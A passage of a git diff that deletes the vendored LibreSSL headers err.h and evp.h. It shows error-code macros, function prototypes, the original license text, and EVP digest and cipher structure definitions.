-#define JPAKEerr(f,r) ERR_PUT_error(ERR_LIB_JPAKE,(f),(r),__FILE__,__LINE__)
-#define GOSTerr(f,r) ERR_PUT_error(ERR_LIB_GOST,(f),(r),__FILE__,__LINE__)
-#define SSLerr(f,r)  ERR_PUT_error(ERR_LIB_SSL,(f),(r),__FILE__,__LINE__)
-#endif
-
-#ifdef LIBRESSL_INTERNAL
-#define SYSerror(r)  ERR_PUT_error(ERR_LIB_SYS,(0xfff),(r),__FILE__,__LINE__)
-#define BNerror(r)   ERR_PUT_error(ERR_LIB_BN,(0xfff),(r),__FILE__,__LINE__)
-#define RSAerror(r)  ERR_PUT_error(ERR_LIB_RSA,(0xfff),(r),__FILE__,__LINE__)
-#define DHerror(r)   ERR_PUT_error(ERR_LIB_DH,(0xfff),(r),__FILE__,__LINE__)
-#define EVPerror(r)  ERR_PUT_error(ERR_LIB_EVP,(0xfff),(r),__FILE__,__LINE__)
-#define BUFerror(r)  ERR_PUT_error(ERR_LIB_BUF,(0xfff),(r),__FILE__,__LINE__)
-#define OBJerror(r)  ERR_PUT_error(ERR_LIB_OBJ,(0xfff),(r),__FILE__,__LINE__)
-#define PEMerror(r)  ERR_PUT_error(ERR_LIB_PEM,(0xfff),(r),__FILE__,__LINE__)
-#define DSAerror(r)  ERR_PUT_error(ERR_LIB_DSA,(0xfff),(r),__FILE__,__LINE__)
-#define X509error(r) ERR_PUT_error(ERR_LIB_X509,(0xfff),(r),__FILE__,__LINE__)
-#define ASN1error(r) ERR_PUT_error(ERR_LIB_ASN1,(0xfff),(r),__FILE__,__LINE__)
-#define CONFerror(r) ERR_PUT_error(ERR_LIB_CONF,(0xfff),(r),__FILE__,__LINE__)
-#define CRYPTOerror(r) ERR_PUT_error(ERR_LIB_CRYPTO,(0xfff),(r),__FILE__,__LINE__)
-#define ECerror(r)   ERR_PUT_error(ERR_LIB_EC,(0xfff),(r),__FILE__,__LINE__)
-#define BIOerror(r)  ERR_PUT_error(ERR_LIB_BIO,(0xfff),(r),__FILE__,__LINE__)
-#define PKCS7error(r) ERR_PUT_error(ERR_LIB_PKCS7,(0xfff),(r),__FILE__,__LINE__)
-#define X509V3error(r) ERR_PUT_error(ERR_LIB_X509V3,(0xfff),(r),__FILE__,__LINE__)
-#define PKCS12error(r) ERR_PUT_error(ERR_LIB_PKCS12,(0xfff),(r),__FILE__,__LINE__)
-#define RANDerror(r) ERR_PUT_error(ERR_LIB_RAND,(0xfff),(r),__FILE__,__LINE__)
-#define DSOerror(r) ERR_PUT_error(ERR_LIB_DSO,(0xfff),(r),__FILE__,__LINE__)
-#define ENGINEerror(r) ERR_PUT_error(ERR_LIB_ENGINE,(0xfff),(r),__FILE__,__LINE__)
-#define OCSPerror(r) ERR_PUT_error(ERR_LIB_OCSP,(0xfff),(r),__FILE__,__LINE__)
-#define UIerror(r) ERR_PUT_error(ERR_LIB_UI,(0xfff),(r),__FILE__,__LINE__)
-#define COMPerror(r) ERR_PUT_error(ERR_LIB_COMP,(0xfff),(r),__FILE__,__LINE__)
-#define ECDSAerror(r)  ERR_PUT_error(ERR_LIB_ECDSA,(0xfff),(r),__FILE__,__LINE__)
-#define ECDHerror(r)  ERR_PUT_error(ERR_LIB_ECDH,(0xfff),(r),__FILE__,__LINE__)
-#define STOREerror(r) ERR_PUT_error(ERR_LIB_STORE,(0xfff),(r),__FILE__,__LINE__)
-#define FIPSerror(r) ERR_PUT_error(ERR_LIB_FIPS,(0xfff),(r),__FILE__,__LINE__)
-#define CMSerror(r) ERR_PUT_error(ERR_LIB_CMS,(0xfff),(r),__FILE__,__LINE__)
-#define TSerror(r) ERR_PUT_error(ERR_LIB_TS,(0xfff),(r),__FILE__,__LINE__)
-#define HMACerror(r) ERR_PUT_error(ERR_LIB_HMAC,(0xfff),(r),__FILE__,__LINE__)
-#define JPAKEerror(r) ERR_PUT_error(ERR_LIB_JPAKE,(0xfff),(r),__FILE__,__LINE__)
-#define GOSTerror(r) ERR_PUT_error(ERR_LIB_GOST,(0xfff),(r),__FILE__,__LINE__)
-#endif
-
-#define ERR_PACK(l,f,r)		(((((unsigned long)l)&0xffL)<<24L)| \
-				((((unsigned long)f)&0xfffL)<<12L)| \
-				((((unsigned long)r)&0xfffL)))
-#define ERR_GET_LIB(l)		(int)((((unsigned long)l)>>24L)&0xffL)
-#define ERR_GET_FUNC(l)		(int)((((unsigned long)l)>>12L)&0xfffL)
-#define ERR_GET_REASON(l)	(int)((l)&0xfffL)
-#define ERR_FATAL_ERROR(l)	(int)((l)&ERR_R_FATAL)
-
-
-/* OS functions */
-#define SYS_F_FOPEN		1
-#define SYS_F_CONNECT		2
-#define SYS_F_GETSERVBYNAME	3
-#define SYS_F_SOCKET		4
-#define SYS_F_IOCTLSOCKET	5
-#define SYS_F_BIND		6
-#define SYS_F_LISTEN		7
-#define SYS_F_ACCEPT		8
-#define SYS_F_WSASTARTUP	9 /* Winsock stuff */
-#define SYS_F_OPENDIR		10
-#define SYS_F_FREAD		11
-
-
-/* reasons */
-#define ERR_R_SYS_LIB	ERR_LIB_SYS       /* 2 */
-#define ERR_R_BN_LIB	ERR_LIB_BN        /* 3 */
-#define ERR_R_RSA_LIB	ERR_LIB_RSA       /* 4 */
-#define ERR_R_DH_LIB	ERR_LIB_DH        /* 5 */
-#define ERR_R_EVP_LIB	ERR_LIB_EVP       /* 6 */
-#define ERR_R_BUF_LIB	ERR_LIB_BUF       /* 7 */
-#define ERR_R_OBJ_LIB	ERR_LIB_OBJ       /* 8 */
-#define ERR_R_PEM_LIB	ERR_LIB_PEM       /* 9 */
-#define ERR_R_DSA_LIB	ERR_LIB_DSA      /* 10 */
-#define ERR_R_X509_LIB	ERR_LIB_X509     /* 11 */
-#define ERR_R_ASN1_LIB	ERR_LIB_ASN1     /* 13 */
-#define ERR_R_CONF_LIB	ERR_LIB_CONF     /* 14 */
-#define ERR_R_CRYPTO_LIB ERR_LIB_CRYPTO  /* 15 */
-#define ERR_R_EC_LIB	ERR_LIB_EC       /* 16 */
-#define ERR_R_SSL_LIB	ERR_LIB_SSL      /* 20 */
-#define ERR_R_BIO_LIB	ERR_LIB_BIO      /* 32 */
-#define ERR_R_PKCS7_LIB	ERR_LIB_PKCS7    /* 33 */
-#define ERR_R_X509V3_LIB ERR_LIB_X509V3  /* 34 */
-#define ERR_R_PKCS12_LIB ERR_LIB_PKCS12  /* 35 */
-#define ERR_R_RAND_LIB	ERR_LIB_RAND     /* 36 */
-#define ERR_R_DSO_LIB	ERR_LIB_DSO      /* 37 */
-#define ERR_R_ENGINE_LIB ERR_LIB_ENGINE  /* 38 */
-#define ERR_R_OCSP_LIB  ERR_LIB_OCSP     /* 39 */
-#define ERR_R_UI_LIB    ERR_LIB_UI       /* 40 */
-#define ERR_R_COMP_LIB	ERR_LIB_COMP     /* 41 */
-#define ERR_R_ECDSA_LIB ERR_LIB_ECDSA	 /* 42 */
-#define ERR_R_ECDH_LIB  ERR_LIB_ECDH	 /* 43 */
-#define ERR_R_STORE_LIB ERR_LIB_STORE    /* 44 */
-#define ERR_R_TS_LIB	ERR_LIB_TS       /* 45 */
-
-#define ERR_R_NESTED_ASN1_ERROR			58
-#define ERR_R_BAD_ASN1_OBJECT_HEADER		59
-#define ERR_R_BAD_GET_ASN1_OBJECT_CALL		60
-#define ERR_R_EXPECTING_AN_ASN1_SEQUENCE	61
-#define ERR_R_ASN1_LENGTH_MISMATCH		62
-#define ERR_R_MISSING_ASN1_EOS			63
-
-/* fatal error */
-#define ERR_R_FATAL				64
-#define	ERR_R_MALLOC_FAILURE			(1|ERR_R_FATAL)
-#define	ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED	(2|ERR_R_FATAL)
-#define	ERR_R_PASSED_NULL_PARAMETER		(3|ERR_R_FATAL)
-#define	ERR_R_INTERNAL_ERROR			(4|ERR_R_FATAL)
-#define	ERR_R_DISABLED				(5|ERR_R_FATAL)
-
-/* 99 is the maximum possible ERR_R_... code, higher values
- * are reserved for the individual libraries */
-
-
-typedef struct ERR_string_data_st {
-	unsigned long error;
-	const char *string;
-} ERR_STRING_DATA;
-
-void ERR_put_error(int lib, int func, int reason, const char *file, int line);
-void ERR_set_error_data(char *data, int flags);
-
-unsigned long ERR_get_error(void);
-unsigned long ERR_get_error_line(const char **file, int *line);
-unsigned long ERR_get_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-unsigned long ERR_peek_error(void);
-unsigned long ERR_peek_error_line(const char **file, int *line);
-unsigned long ERR_peek_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-unsigned long ERR_peek_last_error(void);
-unsigned long ERR_peek_last_error_line(const char **file, int *line);
-unsigned long ERR_peek_last_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-void ERR_clear_error(void );
-char *ERR_error_string(unsigned long e, char *buf);
-void ERR_error_string_n(unsigned long e, char *buf, size_t len);
-const char *ERR_lib_error_string(unsigned long e);
-const char *ERR_func_error_string(unsigned long e);
-const char *ERR_reason_error_string(unsigned long e);
-void ERR_print_errors_cb(int (*cb)(const char *str, size_t len, void *u),
-    void *u);
-void ERR_print_errors_fp(FILE *fp);
-#ifndef OPENSSL_NO_BIO
-void ERR_print_errors(BIO *bp);
-#endif
-void ERR_asprintf_error_data(char * format, ...);
-#ifndef LIBRESSL_INTERNAL
-void ERR_add_error_data(int num, ...);
-void ERR_add_error_vdata(int num, va_list args);
-#endif
-void ERR_load_strings(int lib, ERR_STRING_DATA str[]);
-void ERR_unload_strings(int lib, ERR_STRING_DATA str[]);
-void ERR_load_ERR_strings(void);
-void ERR_load_crypto_strings(void);
-void ERR_free_strings(void);
-
-void ERR_remove_thread_state(const CRYPTO_THREADID *tid);
-#ifndef OPENSSL_NO_DEPRECATED
-void ERR_remove_state(unsigned long pid); /* if zero we look it up */
-#endif
-ERR_STATE *ERR_get_state(void);
-
-#ifndef OPENSSL_NO_LHASH
-LHASH_OF(ERR_STRING_DATA) *ERR_get_string_table(void);
-LHASH_OF(ERR_STATE) *ERR_get_err_state_table(void);
-void ERR_release_err_state_table(LHASH_OF(ERR_STATE) **hash);
-#endif
-
-int ERR_get_next_error_library(void);
-
-int ERR_set_mark(void);
-int ERR_pop_to_mark(void);
-
-/* Already defined in ossl_typ.h */
-/* typedef struct st_ERR_FNS ERR_FNS; */
-/* An application can use this function and provide the return value to loaded
- * modules that should use the application's ERR state/functionality */
-const ERR_FNS *ERR_get_implementation(void);
-/* A loaded module should call this function prior to any ERR operations using
- * the application's "ERR_FNS". */
-int ERR_set_implementation(const ERR_FNS *fns);
-
-#ifdef	__cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/evp.h b/thirdparty/libressl/include/openssl/evp.h
deleted file mode 100644
index 853abe6..0000000
--- a/thirdparty/libressl/include/openssl/evp.h
+++ /dev/null
@@ -1,1501 +0,0 @@
-/* $OpenBSD: evp.h,v 1.53 2017/08/28 17:48:02 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ENVELOPE_H
-#define HEADER_ENVELOPE_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-
-/*
-#define EVP_RC2_KEY_SIZE		16
-#define EVP_RC4_KEY_SIZE		16
-#define EVP_BLOWFISH_KEY_SIZE		16
-#define EVP_CAST5_KEY_SIZE		16
-#define EVP_RC5_32_12_16_KEY_SIZE	16
-*/
-#define EVP_MAX_MD_SIZE			64	/* longest known is SHA512 */
-#define EVP_MAX_KEY_LENGTH		64
-#define EVP_MAX_IV_LENGTH		16
-#define EVP_MAX_BLOCK_LENGTH		32
-
-#define PKCS5_SALT_LEN			8
-/* Default PKCS#5 iteration count */
-#define PKCS5_DEFAULT_ITER		2048
-
-#include <openssl/objects.h>
-
-#define EVP_PK_RSA	0x0001
-#define EVP_PK_DSA	0x0002
-#define EVP_PK_DH	0x0004
-#define EVP_PK_EC	0x0008
-#define EVP_PKT_SIGN	0x0010
-#define EVP_PKT_ENC	0x0020
-#define EVP_PKT_EXCH	0x0040
-#define EVP_PKS_RSA	0x0100
-#define EVP_PKS_DSA	0x0200
-#define EVP_PKS_EC	0x0400
-#define EVP_PKT_EXP	0x1000 /* <= 512 bit key */
-
-#define EVP_PKEY_NONE	NID_undef
-#define EVP_PKEY_RSA	NID_rsaEncryption
-#define EVP_PKEY_RSA2	NID_rsa
-#define EVP_PKEY_DSA	NID_dsa
-#define EVP_PKEY_DSA1	NID_dsa_2
-#define EVP_PKEY_DSA2	NID_dsaWithSHA
-#define EVP_PKEY_DSA3	NID_dsaWithSHA1
-#define EVP_PKEY_DSA4	NID_dsaWithSHA1_2
-#define EVP_PKEY_DH	NID_dhKeyAgreement
-#define EVP_PKEY_EC	NID_X9_62_id_ecPublicKey
-#define EVP_PKEY_GOSTR01 NID_id_GostR3410_2001
-#define EVP_PKEY_GOSTIMIT NID_id_Gost28147_89_MAC
-#define EVP_PKEY_HMAC	NID_hmac
-#define EVP_PKEY_CMAC	NID_cmac
-#define EVP_PKEY_GOSTR12_256 NID_id_tc26_gost3410_2012_256
-#define EVP_PKEY_GOSTR12_512 NID_id_tc26_gost3410_2012_512
-
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-/* Type needs to be a bit field
- * Sub-type needs to be for variations on the method, as in, can it do
- * arbitrary encryption.... */
-struct evp_pkey_st {
-	int type;
-	int save_type;
-	int references;
-	const EVP_PKEY_ASN1_METHOD *ameth;
-	ENGINE *engine;
-	union	{
-		char *ptr;
-#ifndef OPENSSL_NO_RSA
-		struct rsa_st *rsa;	/* RSA */
-#endif
-#ifndef OPENSSL_NO_DSA
-		struct dsa_st *dsa;	/* DSA */
-#endif
-#ifndef OPENSSL_NO_DH
-		struct dh_st *dh;	/* DH */
-#endif
-#ifndef OPENSSL_NO_EC
-		struct ec_key_st *ec;	/* ECC */
-#endif
-#ifndef OPENSSL_NO_GOST
-		struct gost_key_st *gost; /* GOST */
-#endif
-	} pkey;
-	int save_parameters;
-	STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
-} /* EVP_PKEY */;
-
-#define EVP_PKEY_MO_SIGN	0x0001
-#define EVP_PKEY_MO_VERIFY	0x0002
-#define EVP_PKEY_MO_ENCRYPT	0x0004
-#define EVP_PKEY_MO_DECRYPT	0x0008
-
-typedef int evp_sign_method(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigret, unsigned int *siglen,
-    void *key);
-typedef int evp_verify_method(int type, const unsigned char *m,
-    unsigned int m_length, const unsigned char *sigbuf, unsigned int siglen,
-    void *key);
-
-#ifndef EVP_MD
-struct env_md_st {
-	int type;
-	int pkey_type;
-	int md_size;
-	unsigned long flags;
-	int (*init)(EVP_MD_CTX *ctx);
-	int (*update)(EVP_MD_CTX *ctx, const void *data, size_t count);
-	int (*final)(EVP_MD_CTX *ctx, unsigned char *md);
-	int (*copy)(EVP_MD_CTX *to, const EVP_MD_CTX *from);
-	int (*cleanup)(EVP_MD_CTX *ctx);
-
-	evp_sign_method *sign;
-	evp_verify_method *verify;
-	int required_pkey_type[5]; /*EVP_PKEY_xxx */
-	int block_size;
-	int ctx_size; /* how big does the ctx->md_data need to be */
-	/* control function */
-	int (*md_ctrl)(EVP_MD_CTX *ctx, int cmd, int p1, void *p2);
-} /* EVP_MD */;
-
-#define EVP_MD_FLAG_ONESHOT	0x0001 /* digest can only handle a single
-					* block */
-
-#define EVP_MD_FLAG_PKEY_DIGEST	0x0002 /* digest is a "clone" digest used
-					* which is a copy of an existing
-					* one for a specific public key type.
-					* EVP_dss1() etc */
-
-/* Digest uses EVP_PKEY_METHOD for signing instead of MD specific signing */
-
-#define EVP_MD_FLAG_PKEY_METHOD_SIGNATURE	0x0004
-
-/* DigestAlgorithmIdentifier flags... */
-
-#define EVP_MD_FLAG_DIGALGID_MASK		0x0018
-
-/* NULL or absent parameter accepted. Use NULL */
-
-#define EVP_MD_FLAG_DIGALGID_NULL		0x0000
-
-/* NULL or absent parameter accepted. Use NULL for PKCS#1 otherwise absent */
-
-#define EVP_MD_FLAG_DIGALGID_ABSENT		0x0008
-
-/* Custom handling via ctrl */
-
-#define EVP_MD_FLAG_DIGALGID_CUSTOM		0x0018
-
-#define EVP_MD_FLAG_FIPS	0x0400 /* Note if suitable for use in FIPS mode */
-
-/* Digest ctrls */
-
-#define	EVP_MD_CTRL_DIGALGID			0x1
-#define	EVP_MD_CTRL_MICALG			0x2
-#define	EVP_MD_CTRL_SET_KEY			0x3
-#define	EVP_MD_CTRL_GOST_SET_SBOX		0x4
-
-/* Minimum Algorithm specific ctrl value */
-
-#define	EVP_MD_CTRL_ALG_CTRL			0x1000
-
-#define EVP_PKEY_NULL_method	NULL,NULL,{0,0,0,0}
-
-#ifndef OPENSSL_NO_DSA
-#define EVP_PKEY_DSA_method	(evp_sign_method *)DSA_sign, \
-				(evp_verify_method *)DSA_verify, \
-				{EVP_PKEY_DSA,EVP_PKEY_DSA2,EVP_PKEY_DSA3, \
-					EVP_PKEY_DSA4,0}
-#else
-#define EVP_PKEY_DSA_method	EVP_PKEY_NULL_method
-#endif
-
-#ifndef OPENSSL_NO_ECDSA
-#define EVP_PKEY_ECDSA_method   (evp_sign_method *)ECDSA_sign, \
-				(evp_verify_method *)ECDSA_verify, \
-                                 {EVP_PKEY_EC,0,0,0}
-#else
-#define EVP_PKEY_ECDSA_method   EVP_PKEY_NULL_method
-#endif
-
-#ifndef OPENSSL_NO_RSA
-#define EVP_PKEY_RSA_method	(evp_sign_method *)RSA_sign, \
-				(evp_verify_method *)RSA_verify, \
-				{EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
-#define EVP_PKEY_RSA_ASN1_OCTET_STRING_method \
-				(evp_sign_method *)RSA_sign_ASN1_OCTET_STRING, \
-				(evp_verify_method *)RSA_verify_ASN1_OCTET_STRING, \
-				{EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
-#else
-#define EVP_PKEY_RSA_method	EVP_PKEY_NULL_method
-#define EVP_PKEY_RSA_ASN1_OCTET_STRING_method EVP_PKEY_NULL_method
-#endif
-
-#endif /* !EVP_MD */
-
-struct env_md_ctx_st {
-	const EVP_MD *digest;
-	ENGINE *engine; /* functional reference if 'digest' is ENGINE-provided */
-	unsigned long flags;
-	void *md_data;
-	/* Public key context for sign/verify */
-	EVP_PKEY_CTX *pctx;
-	/* Update function: usually copied from EVP_MD */
-	int (*update)(EVP_MD_CTX *ctx, const void *data, size_t count);
-} /* EVP_MD_CTX */;
-
-/* values for EVP_MD_CTX flags */
-
-#define EVP_MD_CTX_FLAG_ONESHOT		0x0001 /* digest update will be called
-						* once only */
-#define EVP_MD_CTX_FLAG_CLEANED		0x0002 /* context has already been
-						* cleaned */
-#define EVP_MD_CTX_FLAG_REUSE		0x0004 /* Don't free up ctx->md_data
-						* in EVP_MD_CTX_cleanup */
-/* FIPS and pad options are ignored in 1.0.0, definitions are here
- * so we don't accidentally reuse the values for other purposes.
- */
-
-#define EVP_MD_CTX_FLAG_NON_FIPS_ALLOW	0x0008	/* Allow use of non FIPS digest
-						 * in FIPS mode */
-
-/* The following PAD options are also currently ignored in 1.0.0, digest
- * parameters are handled through EVP_DigestSign*() and EVP_DigestVerify*()
- * instead.
- */
-#define EVP_MD_CTX_FLAG_PAD_MASK	0xF0	/* RSA mode to use */
-#define EVP_MD_CTX_FLAG_PAD_PKCS1	0x00	/* PKCS#1 v1.5 mode */
-#define EVP_MD_CTX_FLAG_PAD_X931	0x10	/* X9.31 mode */
-#define EVP_MD_CTX_FLAG_PAD_PSS		0x20	/* PSS mode */
-
-#define EVP_MD_CTX_FLAG_NO_INIT		0x0100 /* Don't initialize md_data */
-
-struct evp_cipher_st {
-	int nid;
-	int block_size;
-	int key_len;		/* Default value for variable length ciphers */
-	int iv_len;
-	unsigned long flags;	/* Various flags */
-	int (*init)(EVP_CIPHER_CTX *ctx, const unsigned char *key,
-	    const unsigned char *iv, int enc);	/* init key */
-	int (*do_cipher)(EVP_CIPHER_CTX *ctx, unsigned char *out,
-	    const unsigned char *in, size_t inl);/* encrypt/decrypt data */
-	int (*cleanup)(EVP_CIPHER_CTX *); /* cleanup ctx */
-	int ctx_size;		/* how big ctx->cipher_data needs to be */
-	int (*set_asn1_parameters)(EVP_CIPHER_CTX *, ASN1_TYPE *); /* Populate a ASN1_TYPE with parameters */
-	int (*get_asn1_parameters)(EVP_CIPHER_CTX *, ASN1_TYPE *); /* Get parameters from a ASN1_TYPE */
-	int (*ctrl)(EVP_CIPHER_CTX *, int type, int arg, void *ptr); /* Miscellaneous operations */
-	void *app_data;		/* Application data */
-} /* EVP_CIPHER */;
-
-/* Values for cipher flags */
-
-/* Modes for ciphers */
-
-#define		EVP_CIPH_STREAM_CIPHER		0x0
-#define		EVP_CIPH_ECB_MODE		0x1
-#define		EVP_CIPH_CBC_MODE		0x2
-#define		EVP_CIPH_CFB_MODE		0x3
-#define		EVP_CIPH_OFB_MODE		0x4
-#define		EVP_CIPH_CTR_MODE		0x5
-#define		EVP_CIPH_GCM_MODE		0x6
-#define		EVP_CIPH_CCM_MODE		0x7
-#define		EVP_CIPH_XTS_MODE		0x10001
-#define 	EVP_CIPH_MODE			0xF0007
-/* Set if variable length cipher */
-#define 	EVP_CIPH_VARIABLE_LENGTH	0x8
-/* Set if the iv handling should be done by the cipher itself */
-#define 	EVP_CIPH_CUSTOM_IV		0x10
-/* Set if the cipher's init() function should be called if key is NULL */
-#define 	EVP_CIPH_ALWAYS_CALL_INIT	0x20
-/* Call ctrl() to init cipher parameters */
-#define 	EVP_CIPH_CTRL_INIT		0x40
-/* Don't use standard key length function */
-#define 	EVP_CIPH_CUSTOM_KEY_LENGTH	0x80
-/* Don't use standard block padding */
-#define 	EVP_CIPH_NO_PADDING		0x100
-/* cipher handles random key generation */
-#define 	EVP_CIPH_RAND_KEY		0x200
-/* cipher has its own additional copying logic */
-#define 	EVP_CIPH_CUSTOM_COPY		0x400
-/* Allow use default ASN1 get/set iv */
-#define		EVP_CIPH_FLAG_DEFAULT_ASN1	0x1000
-/* Buffer length in bits not bytes: CFB1 mode only */
-#define		EVP_CIPH_FLAG_LENGTH_BITS	0x2000
-/* Note if suitable for use in FIPS mode */
-#define		EVP_CIPH_FLAG_FIPS		0x4000
-/* Allow non FIPS cipher in FIPS mode */
-#define		EVP_CIPH_FLAG_NON_FIPS_ALLOW	0x8000
-/* Cipher handles any and all padding logic as well
- * as finalisation.
- */
-#define 	EVP_CIPH_FLAG_CUSTOM_CIPHER	0x100000
-#define		EVP_CIPH_FLAG_AEAD_CIPHER	0x200000
-
-/* ctrl() values */
-
-#define		EVP_CTRL_INIT			0x0
-#define 	EVP_CTRL_SET_KEY_LENGTH		0x1
-#define 	EVP_CTRL_GET_RC2_KEY_BITS	0x2
-#define 	EVP_CTRL_SET_RC2_KEY_BITS	0x3
-#define 	EVP_CTRL_GET_RC5_ROUNDS		0x4
-#define 	EVP_CTRL_SET_RC5_ROUNDS		0x5
-#define 	EVP_CTRL_RAND_KEY		0x6
-#define 	EVP_CTRL_PBE_PRF_NID		0x7
-#define 	EVP_CTRL_COPY			0x8
-#define 	EVP_CTRL_GCM_SET_IVLEN		0x9
-#define 	EVP_CTRL_GCM_GET_TAG		0x10
-#define 	EVP_CTRL_GCM_SET_TAG		0x11
-#define		EVP_CTRL_GCM_SET_IV_FIXED	0x12
-#define		EVP_CTRL_GCM_IV_GEN		0x13
-#define		EVP_CTRL_CCM_SET_IVLEN		EVP_CTRL_GCM_SET_IVLEN
-#define		EVP_CTRL_CCM_GET_TAG		EVP_CTRL_GCM_GET_TAG
-#define		EVP_CTRL_CCM_SET_TAG		EVP_CTRL_GCM_SET_TAG
-#define		EVP_CTRL_CCM_SET_L		0x14
-#define		EVP_CTRL_CCM_SET_MSGLEN		0x15
-/* AEAD cipher deduces payload length and returns number of bytes
- * required to store MAC and eventual padding. Subsequent call to
- * EVP_Cipher even appends/verifies MAC.
- */
-#define		EVP_CTRL_AEAD_TLS1_AAD		0x16
-/* Used by composite AEAD ciphers, no-op in GCM, CCM... */
-#define		EVP_CTRL_AEAD_SET_MAC_KEY	0x17
-/* Set the GCM invocation field, decrypt only */
-#define		EVP_CTRL_GCM_SET_IV_INV		0x18
-/* Set the S-BOX NID for GOST ciphers */
-#define		EVP_CTRL_GOST_SET_SBOX		0x19
-
-/* GCM TLS constants */
-/* Length of fixed part of IV derived from PRF */
-#define EVP_GCM_TLS_FIXED_IV_LEN			4
-/* Length of explicit part of IV part of TLS records */
-#define EVP_GCM_TLS_EXPLICIT_IV_LEN			8
-/* Length of tag for TLS */
-#define EVP_GCM_TLS_TAG_LEN				16
-
-typedef struct evp_cipher_info_st {
-	const EVP_CIPHER *cipher;
-	unsigned char iv[EVP_MAX_IV_LENGTH];
-} EVP_CIPHER_INFO;
-
-struct evp_cipher_ctx_st {
-	const EVP_CIPHER *cipher;
-	ENGINE *engine;	/* functional reference if 'cipher' is ENGINE-provided */
-	int encrypt;		/* encrypt or decrypt */
-	int buf_len;		/* number we have left */
-
-	unsigned char  oiv[EVP_MAX_IV_LENGTH];	/* original iv */
-	unsigned char  iv[EVP_MAX_IV_LENGTH];	/* working iv */
-	unsigned char buf[EVP_MAX_BLOCK_LENGTH];/* saved partial block */
-	int num;				/* used by cfb/ofb/ctr mode */
-
-	void *app_data;		/* application stuff */
-	int key_len;		/* May change for variable length cipher */
-	unsigned long flags;	/* Various flags */
-	void *cipher_data; /* per EVP data */
-	int final_used;
-	int block_mask;
-	unsigned char final[EVP_MAX_BLOCK_LENGTH];/* possible final block */
-} /* EVP_CIPHER_CTX */;
-
-typedef struct evp_Encode_Ctx_st {
-	int num;	/* number saved in a partial encode/decode */
-	int length;	/* The length is either the output line length
-			 * (in input bytes) or the shortest input line
-			 * length that is ok.  Once decoding begins,
-			 * the length is adjusted up each time a longer
-			 * line is decoded */
-	unsigned char enc_data[80];	/* data to encode */
-	int line_num;	/* number read on current line */
-	int expect_nl;
-} EVP_ENCODE_CTX;
-
-/* Password based encryption function */
-typedef int (EVP_PBE_KEYGEN)(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md, int en_de);
-
-#ifndef OPENSSL_NO_RSA
-#define EVP_PKEY_assign_RSA(pkey,rsa) EVP_PKEY_assign((pkey),EVP_PKEY_RSA,\
-					(char *)(rsa))
-#endif
-
-#ifndef OPENSSL_NO_DSA
-#define EVP_PKEY_assign_DSA(pkey,dsa) EVP_PKEY_assign((pkey),EVP_PKEY_DSA,\
-					(char *)(dsa))
-#endif
-
-#ifndef OPENSSL_NO_DH
-#define EVP_PKEY_assign_DH(pkey,dh) EVP_PKEY_assign((pkey),EVP_PKEY_DH,\
-					(char *)(dh))
-#endif
-
-#ifndef OPENSSL_NO_EC
-#define EVP_PKEY_assign_EC_KEY(pkey,eckey) EVP_PKEY_assign((pkey),EVP_PKEY_EC,\
